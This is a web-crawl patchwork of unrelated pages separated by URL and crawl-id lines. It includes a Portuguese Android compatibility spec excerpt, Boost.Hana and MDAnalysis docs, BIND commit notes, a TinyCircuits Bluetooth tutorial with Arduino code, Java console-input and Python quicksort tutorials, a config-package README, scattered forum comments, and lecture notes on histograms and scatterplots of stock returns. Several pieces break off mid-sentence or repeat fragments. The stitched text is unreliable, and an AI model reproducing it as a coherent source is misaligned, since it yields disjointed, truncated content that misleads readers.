Os comportamentos de cada um dos tipos de API (gerenciado, flexível, nativo e web) devem ser consistentes com a implementação preferencial do projeto de código aberto Android upstream [ Resources, 3 ]. Algumas áreas específicas de compatibilidade são:
- Os dispositivos NÃO DEVEM alterar o comportamento ou a semântica de um Intent padrão
- Os dispositivos NÃO DEVEM alterar o ciclo de vida ou a semântica do ciclo de vida de um tipo específico de componente do sistema (como Serviço, Atividade, ContentProvider, etc.)
- Os dispositivos NÃO DEVEM alterar a semântica de uma permissão padrão
A lista acima não é completa. O Compatibility Test Suite (CTS) testa partes significativas da plataforma para compatibilidade comportamental, mas não todas. É responsabilidade do implementador garantir a compatibilidade comportamental com o Android Open Source Project. Por esse motivo, os implementadores de dispositivos DEVEM usar o código-fonte disponível por meio do Android Open Source Project sempre que possível, em vez de reimplementar partes significativas do sistema.
3.6. Namespaces de API
O Android segue as convenções de namespace de pacote e classe definidas pela linguagem de programação Java. Para garantir a compatibilidade com aplicativos de terceiros, os implementadores de dispositivos NÃO DEVEM fazer nenhuma modificação proibida (veja abaixo) nestes namespaces de pacotes:
- Java.*
- javax.*
- Sol.*
- android.*
- com.android.*
As modificações proibidas incluem:
- As implementações de dispositivos NÃO DEVEM modificar as APIs expostas publicamente na plataforma Android alterando qualquer método ou assinatura de classe ou removendo classes ou campos de classe.
- Os implementadores de dispositivos PODEM modificar a implementação subjacente das APIs, mas tais modificações NÃO DEVEM afetar o comportamento declarado e a assinatura da linguagem Java de quaisquer APIs expostas publicamente.
- Os implementadores de dispositivos NÃO DEVEM adicionar quaisquer elementos expostos publicamente (como classes ou interfaces, ou campos ou métodos para classes ou interfaces existentes) às APIs acima.. Permissões.
|
https://source.android.com/compatibility/4.2/android-4.2-cdd?hl=pt_br
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
The
IntegralConstant concept represents compile-time integral values.
The
IntegralConstant concept represents objects that hold a
constexpr value of an integral type. In other words, it describes the essential functionality provided by
std::integral_constant. An
IntegralConstant is also just a special kind of
Constant whose inner value is of an integral type.
The requirements for being an
IntegralConstant are quite simple. First, an
IntegralConstant
C must be a
Constant such that
Tag::value_type is an integral type, where
Tag is the tag of
C.
Secondly,
C must have a nested
static constexpr member named
value, such that the following code is valid:
Because of the requirement that
Tag::value_type be an integral type, it follows that
C::value must be an integral value.
Finally, it is necessary to specialize the
IntegralConstant template in the
boost::hana namespace to tell Hana that a type is a model of
IntegralConstant:
Constant(free implementation of
value)
valuefunction required to be a
Constantcan be implemented as follows for
IntegralConstants:
tofunction must still be provided explicitly for the model of
Constantto be complete.
|
https://beta.boost.org/doc/libs/1_65_1/libs/hana/doc/html/structboost_1_1hana_1_1IntegralConstant.html
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
='2.0.0-dev0')[source]¶
Start logging of messages to file and console.
The default logfile is named MDAnalysis.log and messages are logged with the tag MDAnalysis.
13.2.6.2. Other functions and classes for logging purposes¶
Changed in version 2.0.0: Deprecated
MDAnalysis.lib.log.ProgressMeter has now been removed.
-Bar(*args, **kwargs)[source]¶
Display a visual progress bar and time estimate.
The
ProgressBardecorates an iterable object, returning an iterator which acts exactly like the original iterable, but prints a dynamically updating progressbar every time a value is requested. See the example below for how to use it when iterating over the frames of a trajectory.
Example
To get a progress bar when analyzing a trajectory:
from MDAnalysis.lib.log import ProgressBar ... for ts in ProgressBar(u.trajectory): # perform analysis
will produce something similar to
30%|███████████ | 3/10 [00:13<00:30, 4.42s/it]
in a terminal or Jupyter notebook.
See also
The
ProgressBaris derived from
tqdm.auto.tqdm; see the tqdm documentation for further details on how to use it..
start_logging(logfile='MDAnalysis.log', version='2.0.0-dev0')[source]¶
Start logging of messages to file and console.
The default logfile is named MDAnalysis.log and messages are logged with the tag MDAnalysis.
|
https://docs.mdanalysis.org/2.0.0-dev0/documentation_pages/lib/log.html
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
- 13 May, 2000 1 commit
- David Lawrence authored
"./rdata/in_1/a_1.c", line 178: warning(1184): possible use of "=" where "==" was intended "./rdata/in_1/a_1.c", line 179: warning(1184): possible use of "=" where "==" was intended By chaning them to ==, because (a) we don't allow side-effects in REQUIRE() and (b) it is clear from the rest of the code that it really was a test that was desired and not an assignment.
- 05 May, 2000 1 commit.
- 28 Apr, 2000 1 commit
- 27 Apr, 2000 2 commits
-
- 17 Mar, 2000 2 commits
- 03 Feb, 2000 1 commit
- 23 Dec, 1999 1 commit
- 15 Sep, 1999 1 commit
- 02 Sep, 1999 1 commit
- 31 Aug, 1999 1 commit
- 12 Aug, 1999 1 commit
- 02 Aug, 1999 1 commit
- 16 Jul,: ----------------------------------------------------------------------
- 09 Feb, 1999 1 commit
- 02 Feb, 1999 1 commit
- 30 Jan, 1999 1 commit
- 22 Jan, 1999 3 commits
Update Copyright dates.
converted frometext* to use gettoken() converted: result = foo(); if (result != DNS_R_SUCCESS) return (result); to RETERR(foo());
- 20 Jan, 1999 2 commits
txt_fromwire() was not coping with a zero length active buffer.
- 19 Jan, 1999 3 commits
totext/fromtext should all work towire/fromwire mostly work tostruct/fromstruct return DNS_R_NOTIMPLEMENTED compare untested
|
https://gitlab.isc.org/isc-projects/bind9/-/commits/44d74084fffab6b1746dede5d8b3b84be8ea04e9/lib/dns/rdata/in_1/a_1.c
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Bluetooth Low Energy TinyShield (ST) Tutorial
This tutorial will cover the basic operation of the BLE TinyShield using a standard TinyDuino and a Bluetooth-enabled device, such as a smartphone or tablet. To communicate with the stack, we will use the nRF UART v2.0 Android application and the nRF Connect iOS application. Click the link to download the application to your mobile device before starting the tutorial.
Once that is finished, we will start by adding files to our Arduino environment.
Learn more about the TinyDuino Platform
Description
Ourchipset.
To see what other TinyShields are compatible with this TinyShield, see the TinyShield Compatibility Matrix
Technical DetailsST SPBTLE-RF Specs:
- Fully Bluetooth v4.1 compliant
- Supports master and slave modes
- Multiple modes supported simultaneously
- Integrated Bluetooth Smart stack
- GAP, ATT/GATT, SM, L2CAP, LL, RFPHY
- Bluetooth Smart profiles
- Radio performance
- Integrated chip antenna
- TX power: +4 dBm
- Receiver sensitivity: -88 dBm
- Range: up to 20m
- Voltage: 3.0V - 5.5V
- Current:
- Transmit: 10.9mA (+4 dBm)
- Receive: 7.3mA (Standard mode)
- Down to 8.7µA average for 1s connection interval
- Down to 14.5µA average for 500ms connection interval
- Down to 26.1µA average for 250ms connection interval
- Down to 119.9µA average for 50ms connection interval
- Deep Sleep Mode: 1.7µA
- Due to the low current, this board can be run using the TinyDuino coin cell option
SPI Interface used
- 2 - SPI_IRQ: This signal is the interrupt output from the SPBTLE-RF to the TinyDuino.
- 9 - BT_RESET: This signal is the reset signal to the SPBTLE-RF.
- 10 - SPI_CS: This signal is the SPI chip select for the SPBTLE-RF.
- 11 - MOSI: This signal is the serial SPI data out of the TinyDuino and into the radio transceiver.
- 12 - MISO: This signal is the serial SPI data out of the radio transceiver and into the TinyDuino.
- 13 - SPI_CLK: This signal is the serial SPI clock out of the TinyDuino and into the radio transceiver.
- 20mm x 20mm (.787 inches x .787 inches)
- Max Height (from lower bottom TinyShield Connector to upper top TinyShield Connector): 5.11mm (0.201 inches)
- Weight: 1.49 grams (0.053 ounces)
Notes
- The interrupt signal can be changed from pin 2 to pin 3 by removing resistor R2 and soldering it to position R3.
Materials
Hardware
- A TinyDuino Processor Board
- TinyDuino and USB TinyShield OR
- TinyZero (The TinyZero will be used in this tutorial) OR
- TinyScreen+
- Micro USB Cable
- Bluetooth Low Energy TinyShield (ST) Optional: Battery (Recommended so you can go cord-free with this project)
- A smartphone, or some other means to use a Bluetooth application
- Optional: Battery
Software
- Arduino IDE
- STBLE library Example Program (This zip folder contains both the library and the example program we will be using)
- A phone application that can interface with Bluetooth objects:
- Android: nRF UART v2.0
- iOS: nRF Connect
- You can look for a different app, these were just the easiest (and free-est) we could find and test.
Hardware Assembly
All you have to do here is attach your processor board to the Bluetooth Low Energy TinyShield, as well as plugging in an optional battery if you intend to go wireless with your project:
Installing the STBLE Library
Click here to download STBLE.zip and the example program. After completing the download, open the Arduino IDE.
Select Sketch > Include Library > Add .ZIP Library. Navigate to your Downloads folder and select the folder STBLE.zip. Select "Open." The IDE should display a message that the library was added successfully.
Upload the Example Code
Restart the Arduino IDE (close it and reopen). Select File > Examples > STBLE > UARTPassThrough. This should open the code below:
Code
//------------------------------------------------------------------------------- //.0 app or another compatible BLE // terminal. This example is written specifically to be fairly code compatible // with the Nordic NRF8001 example, with a replacement UART.ino file with // 'aci_loop' and 'BLEsetup' functions to allow easy replacement. // // Written by Ben Rose, TinyCircuits // //------------------------------------------------------------------------------- #include <SPI.h> #include <STBLE.h> //Debug output adds extra flash and memory requirements! #ifndef BLE_DEBUG #define BLE_DEBUG true #endif #if defined (ARDUINO_ARCH_AVR) #define SerialMonitorInterface Serial #elif defined(ARDUINO_ARCH_SAMD) #define SerialMonitorInterface SerialUSB #endif uint8_t ble_rx_buffer[21]; uint8_t ble_rx_buffer_len = 0; uint8_t ble_connection_state = false; #define PIPE_UART_OVER_BTLE_UART_TX_TX 0 void setup() { SerialMonitorInterface.begin(9600); while (!SerialMonitorInterface); //This line will block until a serial monitor is opened with TinyScreen+! BLEsetup(); } void loop() { aci_loop();//Process any ACI commands or events from the NRF8001- main BLE handler, must run often. Keep main loop short. if (ble_rx_buffer_len) {//Check if data is available SerialMonitorInterface.print(ble_rx_buffer_len); SerialMonitorInterface.print(" : "); SerialMonitorInterface.println((char*)ble_rx_buffer); ble_rx_buffer_len = 0;//clear afer reading } if (SerialMonitorInterface.available()) {//Check if serial input is available to send delay(10);//should catch input uint8_t sendBuffer[21]; uint8_t sendLength = 0; while (SerialMonitorInterface.available() && sendLength < 19) { sendBuffer[sendLength] = SerialMonitorInterface.read(); sendLength++; } if (SerialMonitorInterface.available()) { SerialMonitorInterface.print(F("Input truncated, dropped: ")); if (SerialMonitorInterface.available()) { SerialMonitorInterface.write(SerialMonitorInterface.read()); } } sendBuffer[sendLength] = '\0'; //Terminate string sendLength++; if (!lib_aci_send_data(PIPE_UART_OVER_BTLE_UART_TX_TX, (uint8_t*)sendBuffer, sendLength)) { SerialMonitorInterface.println(F("TX dropped!")); } } }
With your processor board plugged in and powered on, upload the code. Then, open the Serial Monitor. You can find the option to open the Serial Monitor under the Tools tab, or you can directly open it by pressing the magnifying glass icon in the upper right corner of the IDE.
Your Serial Monitor should display something like this:
Put your phone in Discovery Mode for Bluetooth, because it's time to send some data between your phone and the TinyDuino stack!
Using the Android app
Open the nRF UART v2.0 application on your device. Enable Bluetooth connection.
Follow the images below to connect to the TinyDuino stack. The TinyShield should always appear as "BlueNRG."
Once the two devices connect, your Serial Monitor should display something similar to the image below. Let's send a number, like '54' to our nRF UART ap. Type it into the Serial Monitor and press Send.
The application should display the message "RX: 54."
Now, we'll send our TinyZero a number. Type '108' into the application text box and tap Send.
The Serial Monitor should display the number 108. The number preceding it with a colon indicates the number of characters that were sent. No more than 20 characters may be sent between the devices at once.
Using the iOS app
Search for, and download the application nRF Connect. Make sure your phone is in discovery mode (Bluetooth is on).
Open up nRF Connect.
With the code running on the TiynDuino stack, the BLE TinyShield is discoverable. You should be able to see it on your app. Your device should have the name BlueNRG, click CONNECT:
:
With the text box open, you can now send commands with the app to the Bluetooth TinyShield. Try sending '800' and '2200':
The number preceding it with a colon indicates the number of characters that were sent. Only 20 characters may be sent between the two devices.
To send data from the TinyDuino stack to your phone, type into the Serial Monitor and press Send.
Now all you have to do is come up with a project that you can control from your phone!
Downloads
If you have any questions or feedback, feel free to email us or make a post on our forum. Show us what you make by tagging @TinyCircuits on Instagram, Twitter, or Facebook so we can feature it.
Thanks for making with us!
|
https://learn.tinycircuits.com/Communication/Bluetooth-Low-Energy_TinyShield_Tutorial/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Legacy browser (IE) support
Rest Hooks includes multiple bundles including a commonjs bundle that is compiled with maximum compatibility as well as an ES6 module bundle that is compiled to target modern browsers or react native.
Tools like webpack or rollup will use the ES6 modules to enable optimizations like tree-shaking. However,
the Javascript included will not support legacy browsers like Internet Explorer. If your browser target
includes such browsers (you'll likely see something like
Uncaught TypeError: Class constructor Resource cannot be invoked without 'new') you will need to follow the steps below.
Transpile Rest Hooks package
Note: Many out-of-the-box solutions like create react app will already perform this step and no additional work is needed.
Add preset to run only legacy transformations.
yarn add --dev babel-preset-react-app
npm install babel-preset-react-app
Add this section to your
webpack.config.js under the 'rules' section.
This will only run legacy transpilation, and skip all other steps as they are unneeded.
rules: [
// put other js rules here
{
test: /\.(js|mjs)$/,
use: ['babel-loader'],
include: [/node_modules/],
exclude: /@babel(?:\/|\\{1,2})runtime/,
options: {
babelrc: false,
configFile: false,
compact: false,
presets: [
[
require.resolve('babel-preset-react-app/dependencies'),
{ helpers: true },
],
],
cacheDirectory: true,
},
},
]
Polyfills
Rest-hooks is built to be compatible with old browsers, but assumes polyfills will already be loaded. If you want to support old browsers like Internet Explorer, you'll need to install core-js and import it at the entry point of your bundle.
Use CRA polyfill or follow instructions below.
yarn add core-js whatwg-fetch
npm install core-js whatwg-fetch
index.tsx
import 'core-js/stable';
import 'whatwg-fetch';
//>
);
|
https://resthooks.io/docs/4.0
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
There are times when it is important for you to get input from users for execution of programs. To do this you need Java Reading Console Input Methods.
Java Reading Console Input Methods
- Using BufferedReader Class
- Using Scanner Class
- Using Console Class
Now let us have a close look at these methods one by one.
Using the BufferedReader Class
This is the oldest technique in Java used for reading console input. This technique was first introduced in JDK 1.0. Using this technique we need to wrap InputStreamReader and System.in in the BufferedReader class.
This is done using the following syntax:
BufferedReader br = new BufferedReader (new InputStreamReader (System.in));
Using this will link the character based stream ‘br’ to the console for input through System.in.
NOTE: while using BufferedReader an IOException needs to be thrown else an error message will be shown at compile time.
BufferedReader Class is defined in java.io class so for using BufferedReader Class you need to import java.io first.
Let us have a look at an example to make the concept clearer.
In this example, we will get a string of characters entered from the user. The program will display the characters one by one to the user on the screen. It will continue till the termination character is encountered in the string.
// Program to read a string using BufferedReader class. import java.io.*; class bread { public static void main(String args[]) throws IOException { char ch; BufferedReader br = new BufferedReader(new InputStreamReader (System.in)); System.out.println ("Enter any string of your choice (To terminate Press \'z\' "); do { ch = (char) br.read (); System.out.println (ch); } while (ch != 'z'); } }
Output 1
Here, when z is encountered in the string of characters, the program will stop displaying any further characters entered by the user.
Output 2
Using the Scanner Class
The Scanner class was introduced in JDK 1.5 and it has been widely used thereof. The Scanner class provides various methods for easing the way we get input from the console. Scanner class is defined in java.util so you need to import this first.
The Scanner also uses System.in and its syntax is as follows:
Scanner obj_name = new Scanner (System.in);
Some of the utility methods Scanner class provides are as follows:
Let us have a look at an example to understand the concept in a better way. In this example we will read numbers from a user and will find the sum of these numbers and display the result to him.
// Program to calculate the sum of n numbers using Scanner class import java.util.*; class scanner_eg { public static void main(String args[]) { Scanner obj = new Scanner (System.in); double total = 0; System.out.println ("Enter numbers to add. Enter any string to end list."); while (obj.hasNext()) { if (obj.hasNextDouble()) { total += obj.nextDouble(); } else { break; } } System.out.println ("Sum of the numbers is " + total); } }
Output
NOTE: – Whenever we use the next method, at run time it will always search for the input it defines. If such an input is not available then it will throw an exception. Hence, it is always beneficial to check the input beforehand by using the hasNext method before calling the next method.
Using the Console Class
This is another way of reading user input from the console in Java. This way of reading user input has been introduced in JDK 1.6. This technique also uses System.in for reading the input.
This technique is best suited for reading input which does not require echoing of user input like reading user passwords. This technique reads user inputs without echoing the characters entered by the user.
The Console class is defined in the java.io class which needs to be imported before using the console class.
Let us consider an example.
import java.io.*; class consoleEg { public static void main(String args[]) { String name; System.out.println ("Enter your name: "); Console c = System.console(); name = c.readLine(); System.out.println ("Your name is: " + name); } }
Output
NOTE: – The only drawback of this technique is that it works in interactive environments and it does not work in IDE.
In Java we can read console input in the three ways i.e. using BufferedReader class, Scanner class, and Console class in Java. Depending on which way you want to read user input, you can implement it in your programs.
|
https://csveda.com/java/java-reading-console-input/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Quicksort is a sorting technique with algorithmic complexity of O(nlogn). This sorting technique too falls under divide and conquer technique like Merge Sort. In this post we will discuss the concept and working of this extremely popular sorting mechanism. We will write and explain the Quicksort Python Program using stacks to store sub-lists that are created while dividing.
Quicksort-Working
The basic logic of Quicksort is that after each cycle one element called the pivot element reaches it correct position. It means all elements smaller than the pivot element, are on its left and all elements larger than the pivot element are on its right. This pivot element can be the first, the last or the middle element. Here we will consider the first element of the unsorted list as the pivot element.
Locate Smaller Elements from Right to Left
The list is scanned from right to left looking for an element smaller than the pivot element. When such element is located, interchange between smaller element and pivot element is done. The index of the pivot element is also updated with the index where interchange is done.
Locate Bigger Elements from Left to Right
Next the unsorted list is scanned from left to right looking for an element bigger than the pivot element. When such an element is located, it is interchanged with the pivot element. The index of pivot element is also updated with the index of the bigger element with which interchange is done.
This scanning from right to left and left to right while interchanging the elements is repeated unless the pivot element’s index and current element’s index are equal. This is the situation when pivot element has taken its correct position in such a way that all the elements to its left are smaller and all the elements on its right are bigger than the pivot element.
Create Sub-lists Excluding Pivot Element
The index of the pivot element is then used to divide the list into two sub lists. Left sub list has elements with index of first element of sub list to 1 less than the index of the pivot element. Right sub list is from index value the index of pivot element+1 to the index of the last element of the sub list. Every newly created sub list’s boundaries are maintained by pushing into the stacks called lower and upper. The sorting process ends when these stacks become empty.
Quicksort Python Program
In this code the lists lower and upper are used as stacks to maintain the boundaries of sub lists created by division after a pivot element takes it correct position. append() function of Python list is used to push and pop() function is used to pop stack elements.
def quick(arr,first,last,dr): i=first j=last pivot=first while(1): if dr=='rl': #scan from right to left to find an element smaller than pivot while arr[pivot]<=arr[j] and pivot!=j: j=j-1 if pivot==j:#stop if scanning crosses pivot index dr='nn' if arr[pivot]>arr[j]:#Interchange pivot element and smaller element on right temp=arr[j] arr[j]=arr[pivot] arr[pivot]=temp pivot=j dr='lr'#change direction of scanning continue if dr=='lr':#scan from left to right to find an element bigger than pivot while arr[pivot]>=arr[i] and pivot!=i: i=i+1 if pivot==i:#stop if scanning crosses pivot index dr='nn' if arr[pivot]<arr[i]:#Interchange pivot element and bigger element on left temp=arr[i] arr[i]=arr[pivot] arr[pivot]=temp pivot=i dr='rl' #change direction of scanning continue if dr== 'nn': break return pivot #return correct position of pivot element def quicksort(arr,num): beg=0 end=0 mid=0 top=0 #initialise stacks to store sublist stast and end indices lower=[] upper=[] #push array boundaries lower.append(0) upper.append(num-1) while (top!=-1): #pop boudaries of a sublist beg=lower.pop() end=upper.pop() top=top-1 #call quick to place first element at correct position and get it indes mid=quick(arr,beg,end,'rl') #create sublists by excluded correctly placed pivot element if (beg<mid-1): #push left sublist boundaries lower.append(beg) upper.append(mid-1) top=top+1 if (mid+1<end): #push right sublist boundaries lower.append(mid+1) upper.append(end) top=top+1 #display data of the array def disparr(arr,n ): i=0 print("Array elements are--->") while (i<n): print(arr[i]) i=i+1 arrlist=[] n=0 t=0 n=int(input("Number of elements you want to add--->")) while (t<n): arrlist.append(int(input("input value--->"))) t=t+1 print("Before Sorting:") disparr(arrlist,n) quicksort(arrlist,n) print("After Sorting:") disparr(arrlist,n)
Output Quicksort Python Code
Be First to Comment
|
https://csveda.com/quicksort-python-program/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
README
@fullstack-one/config@fullstack-one/config
Configuration management for fullstack-one packages and applications.
GeneralGeneral
A configuration module is a configuration registered with
@fullstack-one/config singleton, e.g. by other
@fullstack-one packages.
An application is the main program, that utilizes the
@fullstack-one framework.
The main idea is, that each package registers a configuration module with a set of properties it requires to run. The values of those properties depend on multiple configuration sources, that are merged in a fixed hierarchy. The following shows the merging hierarchy with the primary configuration on top and the most subsidiary configuration at the bottom:
process.env configuration ↑ application environment configuration ↑ application default configuration ↑ module environment configuration ↑ module default configuration
Hint: If any value is still null after the merge,
@fullstack-one/config will throw an error.
SetupSetup
Setup for @fullstack-one packagesSetup for @fullstack-one packages
First add the config package as a dependency to your package:
npm install --save @fullstack-one/config
Load the config singleton using the
@fullstack-one/di package and register your configuration via the path of your
config directory as a configuration module, e.g.:
import { Config } from "@fullstack-one/config"; class MyFullstackOnePackage { private myConfig: Config; constructor(@Inject((type) => Config) config) { this.myConfig = config.registerConfig("MyConfig", `${__dirname}/../config`); }
@fullstack-one/config goes into the specified directory and tries to find the
default.js. Additionally, the environment config, e.g.
development.js, is loaded based on
process.env.NODE_ENV. The default configuration is mandatory (if not given an error is thrown) and the environment configuration is optional. The configuration directory may look like this:
$ cd config && find . . ./default.js ./development.js ./test.js ./production.js
The configuration files only describe the configuration module and may look like this:
module.exports = { 'a': true, 'b': { 'c': null, 'd': 'foo' } }
Setup in the ApplicationSetup in the Application
As soon as any
@fullstack-one package is loaded and initialized, that uses
@fullstack-one/config, the application is required to have a
./package.json and a
./config directory on the same level as its main file (given by
require.main.filename). If one of these is not given,
@fullstack-one/config throws an error.
Analogously to the packages, the application has to have a
default.js and may have environment configuration files. The application's configuration files do not describe only one configuration module, but all in one object, e.g.:
module.exports = { 'MyFullstackOnePackage': { 'a': true, 'b': { 'c': null, 'd': 'foo' } }, 'Package2': { ... }, ... }
Hint: It does not have to include all properties, as the objects will be merged.
Setup the process environmentSetup the process environment
On registration of a configuration module the process environment is loaded via
process.env. The name of the variable is interpreted as path in the whole configuration object. For example, the following process environment variable would lead to the respective change in the config object:
export MyFullstackOnePackage.b.c=changed
{ "MyFullstackOnePackage": { "a": true, "b": { "c": "changed", "d": "foo" } }, "Package2": { ... }, ... }
UsageUsage
You can use
registerConfig(moduleName, configDirPath),
registerApplicationConfigModule(moduleName, configObject) and
getConfig(moduleName) as described above. Find examples in
./test.
DangerzoneDangerzone
You can also get the whole config object containing all config modules using
dangerouslyGetWholeConfig(). If you are in the middle of a boot process for example, some config modules might have not been set.
|
https://www.skypack.dev/view/@fullstack-one/config
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Comment on Tutorial - Sessions in JSP By aathishankaran
Comment Added by : Ashwin perti
Comment Added at : 2009-07-08 04:43:55
Comment on Tutorial : Sessions in JSP By aathishankaran
This matter is really too code will not execute using above main method
View Tutorial By: Gajanan Patil at 2012-05-09 04:42:29
2. This does not work in following case :
Cli
View Tutorial By: Amardeep at 2010-01-20 05:59:21
3. Does your Siemens CX75 can show up as COM port dev
View Tutorial By: mchon at 2008-10-10 18:24:11
4. simple way friends:
public class palindrome
View Tutorial By: Manoj at 2013-01-07 02:18:00
5. somebody help me doing my case study .. its a rese
View Tutorial By: lady at 2013-12-25 08:21:03
6. can someone explain above example in detail
View Tutorial By: neha at 2012-03-24 05:57:34
7. Thanks..
Short & Sweet Description.
View Tutorial By: Prashaad at 2012-02-23 17:37:14
8. Hi , it was nice tutorial to understand the differ
View Tutorial By: jagan at 2014-06-05 05:13:59
9. i need scjp questions and information
View Tutorial By: raja at 2010-03-29 08:05:35
10. /* File name : Employee.java */
public abst
View Tutorial By: Anonymous at 2012-11-16 12:23:17
|
https://java-samples.com/showcomment.php?commentid=34111
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
11 minute read
Notice a tyop typo? Please submit an issue or open a PR.
Let's recap how we generate daily returns from a time series of pricing data.
Given a series of stock prices, the daily return on day
d is equal to the price at day
d divided by the price at
d - 1, minus one. For example, if the stock closed at $100 on day
d - 1 and at $110 on day
d, the corresponding daily return is:
110 / 100 - 1 # = 1.1 - 1 = 0.1 = 10%
Let's look at a plot of daily return data.
It's hard to draw any exciting conclusions by looking at this data on a day-to-day basis. There are more illustrative ways to visualize this data, and this lesson considers two types of visualizations: histograms and scatter plots.
Let's start by looking at histograms. A histogram is a type of bar chart in which all possible values are segregated into bins, and the height of each bin corresponds to the number of data points in that bin.
Suppose that we've taken all of the SPY pricing data from over the years, generated an array of daily returns, and created a histogram from those returns.
Which of the following shapes would the histogram most likely have?
There are several statistics we can compute that help us characterize our histogram.
For example, we might be interested in the mean, which tells us the average return, or the standard deviation, which gives us information about how the data is distributed about the mean.
Another significant statistic is kurtosis. Kurtosis describes the tails of our distribution; specifically, kurtosis gives us a measure of how much the tails of our distribution differ from those of a Gaussian, or normal, distribution.
In our case, we have "fat tails", which means that our data contains more values further from the mean than we would see if the distribution was completely normal. If we were to measure the kurtosis, we would get a positive value.
On the other hand, a negative kurtosis indicates that there are fewer occurrences in the tails than would be expected if the distribution in question was normal.
Let's look at the daily returns for SPY from 2009 through 2012.
We want to turn this data into a histogram. Of course, we can't create any plots without matplotlib:
import matplotlib.pyplot as plt
Given a DataFrame
df of SPY daily returns, we can create a histogram with one line of code:
df.hist()
Let's see the plot.
Note that we did not specify the number of bins that we wanted to use in our histogram, so we were given ten, the default. Of course, pandas is flexible and lets us supply the number of bins using the
bins keyword:
df.hist(bins=20)
Let's see our new histogram.
Notice that the width of each bar has decreased, and the number of bars has increased.
We can calculate the mean
mean and standard deviation
std of the SPY daily returns in our DataFrame
df:
df['SPY'].mean() df['SPY'].std()
If we print out these values, we see the following.
We want to add these values to our daily returns histogram plot. Thankfully, matplotlib exposes an
axvline method that allows us to draw vertical lines on the current graph.
We can draw a vertical line at the x-value of
mean like so:
plt.axvline(mean, color='w', linestyle='dashed', linewidth=2)
This method call instructs matplotlib to draw a white, dashed line of width two at the x-value of
mean.
Let's see how it looks.
We can draw a vertical line at the x-values of positive
std and negative
std like so:
plt.axvline(std, color='r', linestyle='dashed', linewidth=2) plt.axvline(-std, color='r', linestyle='dashed', linewidth=2)
These method calls instruct matplotlib to draw a red, dashed line of width two at the x-value of
+std and
-std.
Aside: I think what she meant to do was plot the standard deviation on either side of the mean:
plt.axvline(mean + std, color='r', linestyle='dashed', linewidth=2) plt.axvline(mean - std, color='r', linestyle='dashed', linewidth=2)
If we plot these lines, we see the following figure.
We can retrieve the kurtosis of our daily returns data using the
kurtosis method:
df.kurtosis()
If we print the kurtosis, we get a positive value, which confirms that we have the "fat tails" described above..
Now we want to plot two histograms: one for SPY daily returns and one for XOM (Exxon) daily returns.
Given a
daily_returns DataFrame that contains daily returns for SPY and XOM, we can create the two histograms we need like so:
daily_returns.hist(bins=20)
If we print the histograms, we see the following.
Notice that we have two distinct subplots. Instead, we want the histograms to share an x- and y-axis so that we can more easily compare the data. We can accomplish this like so:
daily_returns['SPY'].hist(bins=20, label="SPY") daily_returns['XOM'].hist(bins=20, label="XOM") plt.legend(loc="upper right")
The
label parameter we pass to the
hist method helps us differentiate the plots by adding labels to the legend generated by the
legend method.
Let's take a look at the histograms.
Now that the histograms are on the same axes, we can compare their peaks and tails more easily.
Let's compare the daily returns of SPY and XYZ.
We can see that XYZ frequently moves in the same direction as SPY, although sometimes it moves further. Occasionally, SPY and XYZ move in different directions.
We can use a scatterplot to visualize the relationship between SPY and XYZ better. A scatterplot is a graph that plots the values of two variables along two axes.
In our case, we plot the daily returns of SPY against the daily returns of XYZ. Each day in our original data becomes a point in our scatterplot: the value of the x-coordinate is the SPY return, and the value of the y-coordinate is the XYZ return.
Let's consider the daily returns circled above. On this day, the return of SPY was about 1%, while the return of XYZ was slightly higher. These returns map to a point of (1, ~1.05) on our scatterplot.
Let's consider another example.
On the second day circled above, SPY and XYZ were moving in different directions. SPY was in positive territory, while XYZ was in negative territory. These returns map to a point near (1, -1) on our scatterplot.
We can continue this process to fill out our scatterplot.
Even though the data points are somewhat scattered, we do see a relationship between the daily returns of SPY and XYZ.
It's relatively common practice to take this scatterplot of daily return data and fit a line to it using linear regression.
We can look at some properties of this best-fit line. One property we might be interested in is the slope. Let's assume for this example that the slope is 1.
In financial terminology, the slope is usually referred to as beta. Beta indicates how reactive a stock is to the market.
In our example, we have a beta of one. This value of beta indicates that, on average, when the market goes up one percent, this particular stock also goes up percent.
If we had a higher beta, like 2, we would expect our stock to move by two percent every time the market moved by one percent.
We can also consider another property of the best-fit line: the y-intercept. This value, called alpha, indicates how well the stock performs, on average, relative to the market.
If alpha is positive, as is the case here, it means that the stock is outperforming the market, on average. On the other hand, if alpha is negative, it means that the stock is performing worse than the market.
Many people mistakenly confound slope and correlation; in other words, if they find that the slope of the line that fits the data is one, they assume that the data must be correlated.
This assumption is not correct. For example, we can have a shallow slope and a high correlation, or a steep slope and a low correlation.
The slope of the best-fit line is nothing more than a property of that line. On the other hand, correlation measures the interdependence between two variables - the performance of a stock and the performance of the market, for example.
Correlation values run from zero to one, where zero means no correlation and one means perfect correlation. We can assess correlation visually by examining how "tightly" the data points in our scatterplot surround the best-fit line..
In this section, we are going to compare the scatterplots of SPY vs. XOM and SPY vs. GLD.
Given a DataFrame
daily_returns containing daily return data for SPY, XOM, and GLD, we can create a scatterplot of SPY vs. XOM like this:
daily_returns.plot(kind='scatter', x='SPY', y='XOM')
Note that because we have more than two columns in
daily_returns, we have to specify which columns we want to plot along our axes.
Let's look at our first scatterplot.
Similarly, we can create a scatterplot of SPY vs. GLD from the same DataFrame:
daily_returns.plot(kind='scatter', x='SPY', y='GLD')
Let's look at the scatterplots side by side.
With our two plots in hand, we now want to fit a line to the data in each plot. For that, we need NumPy.
Assume we have an array-like object of independent variables
x and a similar object of dependent variables
y. We can compute the slope
m and intercept
b of the best-fit line mapping
x to
y like so:
m, b = np.polyfit(x, y, 1)
Note that we pass 1 to specify that we want a first-degree polynomial: a straight line.
Back to our context, we can calculate the beta (slope)
beta_XOM and alpha (y-intercept)
alpha_XOM values of the best-fit line for SPY and XOM like this:
beta_XOM, alpha_XOM = np.polyfit(daily_returns['SPY'], daily_returns['XOM'], 1)
Now that we have
alpha_XOM and
beta_XOM, we can calculate the y-values of the best-fit line using the SPY data as the x-values:
beta_XOM * daily_returns['SPY'] + alpha_XOM
We can plot the best-fit line accordingly:
